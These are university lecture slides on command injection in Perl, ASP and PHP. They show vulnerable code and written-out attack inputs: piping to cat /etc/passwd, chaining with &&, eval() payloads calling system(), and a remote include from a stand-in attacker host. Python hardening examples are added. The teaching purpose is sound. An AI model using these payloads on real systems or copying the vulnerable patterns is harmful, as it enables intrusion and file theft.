Software Security Lecture 4



  1. Software Security Lecture 4
  Fang Yu, Dept. of MIS, National Chengchi University, Spring 2011

  2. Outline
  • Today we will have Adam presenting how to attack authentication (Ch6).
  • Before his presentation, I will continue with Command Injection (Ch9), and I will also present my recent research on how to prevent and remove injection vulnerabilities.
  • The rest of your presentations have been scheduled. Please check the course web page and plan ahead. Let me know if you have any questions.
  • The course website: http://soslab.nccu.edu.tw/Courses.html

  3. Injecting Code II (Chapter 9, The Web Application Hacker's Handbook)

  4. Interpreted Languages: Recall that an interpreted language is one whose execution involves a runtime component that interprets the code of the language and carries out the instructions it contains. Examples: SQL, Perl, ASP, PHP.

  5. Interpreted Languages (cont.): In most applications, the code processed by the interpreter is a mix of instructions written by a programmer and data supplied by a user. An attacker can supply crafted input that breaks out of the data context, usually by supplying some syntax that has a special significance within the grammar of the interpreted language.

  6. Command Injection Attacks: The main problem is incorrect or completely missing validation of user input, which results in the execution of commands on the server. We discussed SQL injection last week. Today we will discuss OS command, web scripting language, SOAP and SMTP injection attacks.

  7. OS Command: Injecting via Perl
  Consider a Perl CGI script that allows administrators to specify a directory and view a summary of its disk usage:

    #!/usr/bin/perl
    use strict;
    use CGI qw(:standard escapeHTML);
    print header, start_html("");
    print "<pre>";
    # base command; the user-supplied "dir" parameter is appended as-is
    my $command = "du -h --exclude php* /var/www/html";
    $command = $command.param("dir");
    # backticks hand the whole string to the shell for execution
    $command = `$command`;
    print "$command\n";
    print end_html;

  8. When used as intended:

  9. Injecting via Perl: "|" is used to redirect the output of one process to the input of another process. This enables multiple commands to be chained together.

  10. Inject code: (cat /etc/passwd)

  11. OS Command: Injecting via ASP
  Consider ASP code that allows administrators to view the contents of a requested log file:

    <%
    Set oScript = Server.CreateObject("WSCRIPT.SHELL")
    Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
    ' "type" prints the log file; the FileName form field is appended as-is
    szCMD = "type c:\inetpub\wwwroot\logs\" & Request.Form("FileName")
    szTempFile = "C:\" & oFileSys.GetTempName()
    ' cmd.exe executes the assembled command and redirects its output to a temp file
    Call oScript.Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0)
    %>

  12. When used as intended: (submit last5.log)

  13. Use && to batch multiple commands together:
  • Last5.log && dir c:\
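The Perl "|" and ASP "&&" slides share one root cause: a user-supplied name is spliced into a command string that a shell then parses. The hardened counterpart below is an added example written in Python, not code from the lecture or the book; it assumes a strict allowlist for the name and builds an argv list instead of a command string (the base paths are the ones on the slides).

```python
import re
import subprocess

# Allowlist for the user-controlled fragment: a single bare file or
# directory name. Anything carrying shell syntax ("|", "&&", ";", "`",
# "$(...)", ">") or a path separator is rejected, never "escaped".
_SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]{1,64}")

def is_safe_name(value: str) -> bool:
    return bool(_SAFE_NAME.fullmatch(value)) and value not in (".", "..")

def safe_name(value: str) -> str:
    """Return value unchanged if it passes the allowlist, else raise."""
    if not is_safe_name(value):
        raise ValueError(f"rejected unsafe parameter value: {value!r}")
    return value

def du_argv(user_dir: str, base: str = "/var/www/html") -> list:
    """Hardened form of the Perl slide: the validated name becomes one argv
    element, so a '|' in the input never reaches a shell."""
    return ["du", "-h", "--exclude", "php*", f"{base}/{safe_name(user_dir)}"]

def log_view_argv(file_name: str, base: str = r"c:\inetpub\wwwroot\logs") -> list:
    """Hardened form of the ASP slide. 'type' is a cmd.exe builtin, so cmd.exe
    still parses this line; the allowlist (no '&&') is what makes it safe."""
    return ["cmd.exe", "/c", "type", base + "\\" + safe_name(file_name)]

def run_argv(argv: list) -> str:
    # shell=False (the default): argv goes straight to exec(); no shell
    # interprets |, &&, > or backticks in the arguments.
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout

if __name__ == "__main__":
    print(du_argv("images"))
    for bad in ("images | cat /etc/passwd", "Last5.log && dir c:\\"):
        print(bad, "->", "rejected" if not is_safe_name(bad) else "accepted")
```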

  14. Dynamic Execution Vulnerabilities
  • The PHP function eval() is used to dynamically execute code that is passed to the function at runtime.
  • Consider a search function that enables users to create stored searches. A request looks like:
      https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh
  • The server-side implementation:
      $storedsearch = $_GET['storedsearch'];
      eval("$storedsearch;");
  • This creates a mysearch variable with the value wahh.

  15. Dynamic Execution in PHP
  The semicolon character can be used to batch commands together in a single parameter. For example, to retrieve the contents of the file /etc/passwd, you could use either file_get_contents or the system command:
      https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh;%20echo%20file_get_contents('/etc/passwd')
      https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh;%20system('cat%20/etc/passwd')
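The fix for the eval() slides is to treat storedsearch as data with a fixed grammar rather than as PHP code. The parser below is an added example in Python, not the lecture's or the book's code; it assumes the decoded parameter value is of the form $name=value (pairs separated by ";"), so that the batched echo/system fragments from the slide fail to parse instead of being executed.

```python
import re

# Accepted grammar for one stored-search fragment: "$name=value", where
# name is a PHP-style identifier and value is a short run of word
# characters. Function calls, quotes, spaces and parentheses do not match.
_PAIR = re.compile(r"\$([A-Za-z_][A-Za-z0-9_]*)=([A-Za-z0-9_-]{0,128})")

def parse_stored_search(param: str) -> dict:
    """Interpret the storedsearch parameter without eval().

    Returns {name: value}. Raises ValueError on any fragment outside the
    grammar, so "$mysearch=wahh" yields {"mysearch": "wahh"} while
    "$mysearch=wahh; system('cat /etc/passwd')" is rejected as a whole.
    """
    result = {}
    for chunk in param.split(";"):
        chunk = chunk.strip()
        if not chunk:          # tolerate a trailing ";"
            continue
        m = _PAIR.fullmatch(chunk)
        if m is None:
            raise ValueError(f"malformed stored search fragment: {chunk!r}")
        result[m.group(1)] = m.group(2)
    return result

def is_valid_stored_search(param: str) -> bool:
    try:
        parse_stored_search(param)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    print(parse_stored_search("$mysearch=wahh"))
    print(is_valid_stored_search("$mysearch=wahh; echo file_get_contents('/etc/passwd')"))
```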

  16. File Inclusion Attacks
  Consider an application that delivers different content to people in different locations. A request looks like:
      https://wahh-app.com/main.php?Country=US
  The application processes it as follows:
      $country = $_GET['Country'];
      include( $country . '.php' );

  17. File Inclusion Attacks (cont.)
  If the request is intercepted and modified to:
      https://wahh-app.com/main.php?Country=http://wahh-attacker.com/backdoor
  the server side effectively executes:
      $country = $_GET['Country'];
      include( 'http://wahh-attacker.com/backdoor' . '.php' );
  and may therefore include an arbitrary remote file.
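A defensive counterpart to the include() slides, as an added Python example that is not part of the lecture or the book. It assumes a constructed allowlist of shipped templates (the slide only names US) and a template directory path; the Country value is validated before any include happens, so the remote URL from the slide is refused regardless of PHP's allow_url_include setting.

```python
import os
import re

# Constructed allowlist of the templates the application actually ships
# (hypothetical; the lecture only shows Country=US).
KNOWN_COUNTRIES = {"US", "UK", "DE", "TW"}

_COUNTRY_CODE = re.compile(r"[A-Z]{2}")

def resolve_country_template(country: str, base_dir: str) -> str:
    """Map the Country parameter to a local template path.

    Three independent checks, any one of which stops the slide's attack:
    1. the value must be a two-letter code (no scheme, no slashes, no dots);
    2. it must be in the allowlist, so only shipped templates are eligible;
    3. the resolved path must still lie inside base_dir.
    """
    if not _COUNTRY_CODE.fullmatch(country):
        raise ValueError(f"Country is not a two-letter code: {country!r}")
    if country not in KNOWN_COUNTRIES:
        raise ValueError(f"unknown country: {country!r}")
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, country + ".php"))
    if os.path.commonpath([base, path]) != base:
        raise ValueError("resolved template escapes the template directory")
    return path

def is_acceptable_country(country: str, base_dir: str = "/var/www/templates") -> bool:
    try:
        resolve_country_template(country, base_dir)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    print(resolve_country_template("US", "/var/www/templates"))
    print(is_acceptable_country("http://wahh-attacker.com/backdoor"))
```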

  18. Quiz: What is the main cause of injection vulnerabilities? How can injection vulnerabilities be prevented? Let's talk a little bit about Stranger.

  19. Next week: We will have Juliette presenting Attacking Session Management (Chapter 7) and Jorina presenting Attacking Access Controls (Chapter 8). We will also have Hsing Huang presenting Burp Suite, a tool set for analyzing and attacking web applications.
